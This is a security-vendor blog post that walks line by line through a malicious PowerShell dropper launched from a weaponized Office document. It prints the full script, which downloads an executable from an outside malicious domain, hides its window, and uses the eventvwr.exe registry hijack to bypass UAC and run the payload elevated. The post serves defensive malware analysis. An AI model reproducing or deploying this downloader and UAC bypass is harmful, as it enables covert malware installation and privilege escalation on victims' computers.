Sophos acquires machine learning visionary Invincea.

Powershell Exploit Analyzed Line-by-Line

By
Mar 6, 2017

PowerShell is one of the top applications used by malware authors to gain a foothold on a victim’s computer.  One reason why it is so frequently used is because of its vast abilities to make changes to the operating system and system resources.  It takes the native Windows command line to another level in terms of its capabilities.  Once a malicious process is able to hook into the PowerShell command line with elevated privileges its capabilities are endless.

In this blog, I will analyze a PowerShell attack that takes advantage of a known UAC exploit line-by-line.  It is unusual for us to encounter such a cleanly written PowerShell script.  This presented us an opportunity to analyze the script and see exactly what was happening during these attacks.

There are a handful of commonly used commands that are used across almost all Powershell attacks.  I will discuss these as well as those that are particular to the UAC bypass exploit.  It is important to know both types of commands and how they modify a victim’s system.

The Attack

In this event, the victim opened a weaponized document with malicious macros that spawned a PowerShell script. 

Weaponized documents are a common attack method we have previously detailed.  In this example, once the macros were allowed to execute with elevated privileges the script ran a PowerShell command seen below.

At first glance, this script seems pretty elaborate and complicated.  However, it’s actually quite simple and straightforward with the exception of a few registry changes that will be discussed later.  The majority of the commands here are used to avoid detection.  The process runs seamlessly in the background without ever needing to alert the user or ask for elevated privileges to make any changes.

By using a small percentage of RAM and CPU cycles, the victim will not notice any performance impact.  Without the help of a process monitoring application or task manager tools it would be nearly impossible to know that this application is running in the background.  However, since the user was equipped with X by Invincea they were protected from the attack and the event logs were captured.

Powershell Line-By-Line

1               “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe”

First line of the command opens the PowerShell application from the Windows System32 directory.

2               -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;

These additional commands open PowerShell as a hidden window so it is not visible to the victim.  The variable “$wscript” is created and assigned to the created WScript.Shell instance.  WScript.Shell provides access to the OS shell methods which substantially increase the capabilities and the types of applications that PowerShell can interact with.

3               $webclient = new-object System.Net.WebClient;

The variable $webclient is created and is given a System.Net.WebClient instance.  The WebClient class provides a list of methods that allow the instantiated object to send and receive data from web servers identified by a URL.

4               $random = new-object random;

This command simply creates a new instance of a random object ($random).

5               $urls = ‘http://dfgdfg.top/officsemgmts.exe’.Split(‘,’);

The $urls variable is assigned to a malicious binary (officemgmts.exe) hosted on a malicious domain.  This variable is also capable of stringing together multiple binaries hosted on different domains by simply separating the different URLs with commas.  This is useful if the adversary has a list of domains in which some are active and others are not.

6               $name = $random.next(1, 65536);

The $name variable is assigned a random number from the $random variable between 1 and 65536.

7               $path = $env:temp + ‘\’ + $name + ‘.exe’;

The $path variable is set to the Windows environment variable directory which points to the user’s AppData temp folder.  A new executable file is created in this folder and is given a random name from the $name variable above.

8               $hkey = ‘HKCU\Software\Classes\mscfile\shell\open\command\’;

A new variable $hkey is assigned a specific registry key.  This registry key is particularly important in regards to UAC (User Account Control) bypass and will be discussed later.

9               $sleep = 3000;

The $sleep variable is assigned a value of 3000 seconds.

10            foreach($url in $urls){try{

In this next section, we will look at what the script does for each value in the $urls variable.  The script iterates through each URL given in the $urls variable and runs the subsequent commands on it.  In this case, there is only one URL in the $urls variable so the script will only loop through once.

11                              $webclient.DownloadFile($url.ToString(), $path);

The $webclient variable is used to download a file from the website in the $urls variable to the path specified in the $path variable.  Explicitly, this downloads the “officsemgmts.exe” file to the %appdata%\local\temp folder.

12                              $wscript.RegWrite($hkey, $path);

This is where the UAC bypass is written.  Using wscript, powershell writes the $path value (downloaded binary) to the $hkey registry key.  Now, whenever a process queries that registry key, it will return whatever value is written in $hkey.  Microsoft Event Viewer is a system tool in particular that interacts with this registry key.

13                              Start-Sleep -m $sleep;

The process sleeps for 3000 milliseconds, specified by the –m flag in front of the $sleep variable.

14                              Start-Process -WindowStyle hidden -FilePath ‘eventvwr.exe’;

This is where the UAC bypass is exploited.  The script executes the “eventvwr.exe” file, which is a signed Microsoft binary that runs with elevated administrative privileges.  This is important because there is no prompt that allows the user to deny privilege escalation.  The process automatically runs as an administrator without notifying the user.  The vulnerability is in that “eventvwr.exe” queries a key in the HKEY_CURRENT_USER (HKCU) hive before it queries the corresponding key in the HKEY_CLASSES_ROOT (HKCR) hive.  As seen in line 12, the malicious binary downloaded occupies the value at the particular registry key that “eventvwr.exe” queries, and as a result it runs the malicious binary.

The HKEY_CLASSES_ROOT hive should be of a higher integrity classification than the HKEY_CURRENT_USER hive being that it provides a view of the registry that merges information from the HKCU and HKLM hives.  Registry entries subordinate to the HKCR key define types (or classes) of documents and the properties associated with those types (Shell and COM applications use the information stored under this key), while registry entries subordinate to the HKCU key define the preferences of the current user[1].  However when “eventvwr.exe” queries the registry it reads from the HKCU key before the HKCR key.  Essentially the process is running data from a registry key, if it exists, with less integrity before it queries the equivalent registry key with greater integrity.  One of the three Biba integrity axioms states that a subject of greater integrity should not read an object of lower integrity (no read down).  If the process running with elevated privileges is reading two corresponding registry keys, its first order should read from the HKCR hive before the HKCU hive.

UAC bypass is intended to make the Windows experience more user-friendly, but when leveraged by the wrong person or process, it can prove to be hazardous.  More info on UAC in Windows 7 can be found here.

15                              Start-Sleep -m $sleep;

The process sleeps for 3000 milliseconds, specified by the –m flag in front of the $sleep variable.

16                              $wscript.RegDelete($hkey);

Once the UAC bypass is executed and the process sleeps for 3 seconds, the script deletes the registry key to cover its tracks.

17                              $process = Get-Process $name -ErrorAction silentlycontinue;

The $process variable is set as the name of the random file created in the temp directory.  If there is an error retrieving the process name, the script will silently continue.

18                              if(!$process){Start-Process -WindowStyle hidden -FilePath $path;}break;}

If the previous command failed to return a process and continued silently, the window remains hidden and the process breaks.

19                              catch{write-host $_.Exception.Message;}

This is another mechanism to keep the script running silently in the background.

Conclusion

The UAC bypass vulnerability is one of many vulnerabilities that can be exploited if a hacker has PowerShell access.  It is also important to know and recognize when PowerShell scripts are used in a malicious way to affect sensitive system data.  Several lines of code seen here are used ubiquitously for most PowerShell exploits due to the common nature of exploit kits attempting to remain silent, exploits being downloaded from URLs on the web, process execution methods, and process termination methods.  Fortunately, X by Invincea uses behavioral monitoring to prevent exploits from common attack methods, whether it be from a weaponized document or a malicious script on a webpage.

[1] https://msdn.microsoft.com/en-us/library/windows/desktop/ms724836(v=vs.85).aspx

You may also be interested in...

Ransomware’s Stronghold on Healthcare

read more

X by Invincea: HIPAA and HITRUST Compliance

read more

Invincea receives perfect score from SC Magazine

read more